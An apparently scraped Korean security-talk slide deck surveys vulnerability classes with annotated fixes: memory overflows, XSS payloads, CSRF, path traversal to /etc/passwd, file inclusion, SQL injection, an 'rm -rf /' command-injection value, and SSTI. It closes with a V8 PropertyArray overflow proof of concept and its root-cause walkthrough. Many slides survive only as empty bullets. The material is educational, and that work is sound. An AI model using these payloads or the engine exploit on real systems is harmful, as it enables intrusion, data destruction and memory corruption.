
[131]해커의 관점에서 바라보기

해커의 관점에서 바라보기


[131]해커의 관점에서 바라보기

  1. 1. • • • •
  2. 2. • • • • • • • •
  3. 3. • •
  4. 4. • • •
  5. 5. • • • • • •
  6. 6. • • • • •
  7. 7. • • • • •
  8. 8. • • • • •
  9. 9. • • • • •
  10. 10. • • • • •
  11. 11. ü ü ü ü ü ü ü ü ü ü
  12. 12. • • • • •
  13. 13. • • • • •
  14. 14. • • • • • • • •
  15. 15. • • • • • Stack Heap ELF, libc, etc. Low Address High Address grows down grows up
  16. 16. int vuln() { char buf[512]; gets(buf); return 0; } 0x0804841d <+0>: push ebp 0x0804841e <+1>: mov ebp,esp 0x08048420 <+3>: sub esp,0x204 0x08048426 <+9>: lea eax,[ebp-0x200] 0x0804842c <+15>: mov DWORD PTR [esp],eax 0x0804842f <+18>: call 0x80482f0 <gets@plt> 0x08048434 <+23>: mov eax,0x0 0x08048439 <+28>: leave 0x0804843a <+29>: ret . . . return address old ebp at main buf . . . A A A A A A A A A A A A . . . A A A A A A A A A A A A 512 bytes — gets() reads until a newline with no length limit, so input longer than 512 bytes runs past buf (at ebp-0x200) into the saved ebp and the return address shown above it in the stack diagram. gets() was removed from C11; use fgets(buf, sizeof buf, stdin) or another bounded read.
  17. 17. void vuln(unsigned width, unsigned height, char *src) { char *img = malloc(width * height); for (i = 0; i < height; ++i) memcpy(&img[i*width], &src[i*width], width); } img C++ object ... ...A A A A A A A A A A A . . . A A A ↑ virtual function table — width * height is computed in unsigned arithmetic and silently wraps, so malloc() can return a buffer far smaller than the height rows of width bytes the loop then copies; the excess writes run past img into the neighbouring C++ object and its virtual function table pointer (diagram). Reject the input when height != 0 && width > SIZE_MAX / height (or use a checked multiply) before allocating.
  18. 18. Heap Segment Heap Chunk (Freed) Heap Chunk Heap Chunk Pointer Heap Segment Heap Chunk (Freed) Heap Chunk (Freed) Heap Chunk Pointer Heap Segment Heap Chunk (Freed) Heap Chunk (Freed) Heap Chunk Pointer Heap Segment Heap Chunk (Newly alloc’d) Heap Chunk Pointer AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAAAAAAA AAAAAAAA..... •
  19. 19. void vuln() { char buf[24]; strncpy(buf, src, sizeof(buf)); printf("You typed %s\n", buf); } • • — strncpy() does not NUL-terminate buf when src is 24 bytes or longer, so the %s read continues past buf into whatever follows it on the stack (an information leak rather than an overwrite). Terminate explicitly (buf[sizeof(buf) - 1] = '\0') or print with a bounded width (printf("%.*s", (int)sizeof(buf), buf)).
  20. 20. • • • • • •
  21. 21. • • • •
  22. 22. <div id="pageTitleTxt"> <h2><span class="highlight">Search Results</span><br /> Search: "gravity"</h2> </div> <div id="pageTitleTxt"> <h2><span class="highlight">Search Results</span><br /> Search: ""<script>alert(document.cookie)</script>""</h2> </div>
  23. 23. • <a href="http://server.com/transfer?acct=EvilAttacker&amount=300BTC">Click here!</a> — a state-changing transfer reachable by GET and authenticated only by the victim's session cookie is what makes this CSRF link work; require POST with a per-session anti-CSRF token (and SameSite cookies).
  24. 24. • HTTP/1.1 200 OK Date: Thu, 11 Oct 2018 13:33:37 GMT Server: Apache/2.4.35 (Debian) X-Powered-By: PHP/7.2.10 Access-Control-Allow-Origin: * Content-Length: 4 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: application/json — Access-Control-Allow-Origin: * lets scripts on any origin read this JSON response; browsers refuse to send credentials to a wildcard origin, so the exposure is limited to data the server returns without a session, but the header should still be restricted to an allow-list of trusted origins.
  25. 25. • • • •
  26. 26. • • • • • • • •
  27. 27. • • http://www.server.com/view?file=../../../../etc/passwd
  28. 28. • • $page = $_GET['page']; include('pages/' . $page); http://server.com/?page=../../uploads/evil.php — the URL parameter must be the one the code reads (page, not file); its value reaches include() unsanitised, so ../ sequences escape pages/ and a previously uploaded evil.php is executed. Map the value onto a fixed allow-list of page names instead of concatenating it into the path.
  29. 29. • • SELECT id FROM users WHERE username='user' AND password='pass' OR '1'='1' uname = request.POST['username'] passwd = request.POST['password'] sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'" database.execute(sql) Username: user Password: pass' OR '1'='1 — the payload as originally shown (pass' OR 1=1) leaves an unmatched quote and the query fails to parse; the form above keeps the quotes balanced so the OR '1'='1' clause is always true and every id matches. Fix by binding uname and passwd as query parameters instead of concatenating them.
  30. 30. • • os.system("sendmail %s < message.txt" % email_addr) email_addr = "a && rm -rf / ;" render("Hello, %s! Welcome to {{ site.name }}" % name) name = "{{ self }}" — the shell parses the interpolated address, so the && chain runs an arbitrary command; pass arguments as a list to subprocess.run() without shell=True (the slide named the variable email, which the code never reads). In the second example the user's name is spliced into the template source before rendering, so template syntax inside it is evaluated (SSTI); pass it to the template as a variable instead.
  31. 31. • • 컨테이너 대상 공격 표면 및 발생 가능 취약점 • • • • • •
  32. 32. • • • • (a+)+
  33. 33. • • • •
  34. 34. • • •
  35. 35. • • •
  36. 36. • •
  37. 37. • • • • • •
  38. 38. • • • • • • • •
  39. 39. • • • • •
  40. 40. • • • • • •
  41. 41. • • • •
  42. 42. • • • • •
  43. 43. • • • • • • •
  44. 44. • • • • •
  45. 45. • • • • • •
  46. 46. • • • • •
  47. 47. • • • •
  48. 48.
  49. 49. • • • • •
  50. 50. • • • • $ binwalk firmware.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 TRX firmware header, little endian, header size: ... 28 0x1C LZMA compressed data, properties: 0x5D, ... 2319004 0x23629C Squashfs filesystem, little endian, version 4.0, ...
  51. 51. • • • •
  52. 52. • • • •
  53. 53. • • • •
  54. 54. 위험성 평가 보안성 지속 관리 코드 리뷰 및 모의해킹 정적/동적 분석 위협 모델링
  55. 55.
  56. 56. • • •
  57. 57. • ü ü ü ü ü ü ü ü ü ü
  58. 58. • •
  59. 59. • • • • • • •
  60. 60. • <input type="hidden" value=""><img src=x onerror="alert(1)"> • <input value="" type="text" onfocus="alert(1)" autofocus="1" type="hidden"> • <input type="hidden" value="" accesskey="x" onclick="alert(1)">
  61. 61. • • function gc() { for (let i = 0; i < 20; i++) new ArrayBuffer(0x1000000); } function trigger() { function* generator() { } for (let i = 0; i < 1022; i++) { generator.prototype['b' + i]; generator.prototype['b' + i] = 0x1234; } gc(); for (let i = 0; i < 1022; i++) { generator.prototype['b' + i] = 0x1234; } } trigger();
  62. 62. • • MigrateFastToFast
  63. 63. • MigrateFastToFast PropertyArray void MigrateFastToFast(Handle<JSObject> object, Handle<Map> new_map) { ... int old_number_of_fields; int number_of_fields = new_map->NumberOfFields(); int inobject = new_map->GetInObjectProperties(); int unused = new_map->unused_property_fields(); ... int total_size = number_of_fields + unused; int external = total_size - inobject; Handle<PropertyArray> array = isolate->factory()->NewPropertyArray(external); ... } •new_map argument could come from Map::CopyWithField
  64. 64. • Map::CopyAddDescriptor • unused_property_fields • JSObject::kFieldsAdded == 3 • kMaxNumberOfDescriptors • total_size • external MigrateFastToFast MaybeHandle<Map> Map::CopyWithField(Handle<Map> map, Handle<Name> name, Handle<FieldType> type, PropertyAttributes attributes, PropertyConstness constness, Representation representation, TransitionFlag flag) { ... if (map->NumberOfOwnDescriptors() >= kMaxNumberOfDescriptors) { return MaybeHandle<Map>(); } ... Descriptor d = Descriptor::DataField(name, index, attributes, constness, representation, wrapped_type); Handle<Map> new_map = Map::CopyAddDescriptor(map, &d, flag); int unused_property_fields = new_map->unused_property_fields() - 1; if (unused_property_fields < 0) { unused_property_fields += JSObject::kFieldsAdded; } new_map->set_unused_property_fields(unused_property_fields); return new_map; }
  65. 65. Handle<PropertyArray> Factory::NewPropertyArray(int size, PretenureFlag pretenure) { DCHECK_LE(0, size); if (size == 0) return empty_property_array(); CALL_HEAP_FUNCTION(isolate(), isolate()->heap()->AllocatePropertyArray(size, pretenure), PropertyArray); } AllocationResult Heap::AllocatePropertyArray(int length, PretenureFlag pretenure) { ... result->set_map_after_allocation(property_array_map(), SKIP_WRITE_BARRIER); PropertyArray* array = PropertyArray::cast(result); array->initialize_length(length); MemsetPointer(array->data_start(), undefined_value(), length); return result; }
  66. 66. int PropertyArray::length() const { Object* value_obj = READ_FIELD(this, kLengthAndHashOffset); int value = Smi::ToInt(value_obj); return LengthField::decode(value); } class PropertyArray : public HeapObject { public: inline int length() const; inline int synchronized_length() const; inline void initialize_length(int length); ... static const int kLengthFieldSize = 10; class LengthField : public BitField<int, 0, kLengthFieldSize> {}; class HashField : public BitField<int, kLengthFieldSize, kSmiValueSize - kLengthFieldSize - 1> {}; ... };
  67. 67. • length() • • • • • •
  68. 68. b0 b1 b2 b3 b1019 b1020 b1021 PropertyArray new_map->NumberOfFields() == 1022 MigrateFastToFast: new_map->unused_property_fields() == 2 external == 1022 + 2 == 1024 Handle<PropertyArray> array = isolate->factory()->NewPropertyArray(external); b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) array->initialize_length(length); — length == 1024 == 1 << 10 does not fit in the 10-bit LengthField, so the value read back through LengthField::decode() is 0 (the low 10 bits of 1024 are all zero) while the allocation still holds 1024 slots.
  69. 69. b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) Scavenger::ScavengeObject array->synchronized_length() == 0 Scavenger::EvacuateObject HeapObject::SizeFromMap PropertyArray::synchronized_length LengthField::decode Scavenger::SemiSpaceCopyObject Scavenger::PromoteObject Scavenge/GC: returns 0 Allocate the new memory using the result of SizeFromMap
  70. 70. b0 b1 b2 b3 b1019 b1020 b1021 array (PropertyArray) After Scavenge/GC: ? ? ? ? ? ? ? array (PropertyArray) Now in Old Space with size of 0, but we can still access up to 1022 properties! !
  71. 71. • for (let i = 0; i < 1022; i++) { generator.prototype['b' + i] = 0x1234; } for (let i = 0; i < 1022; i++) { try { document.write(i + " ==> " + generator.prototype['b' + i] + "<br>"); } catch (e) { } }
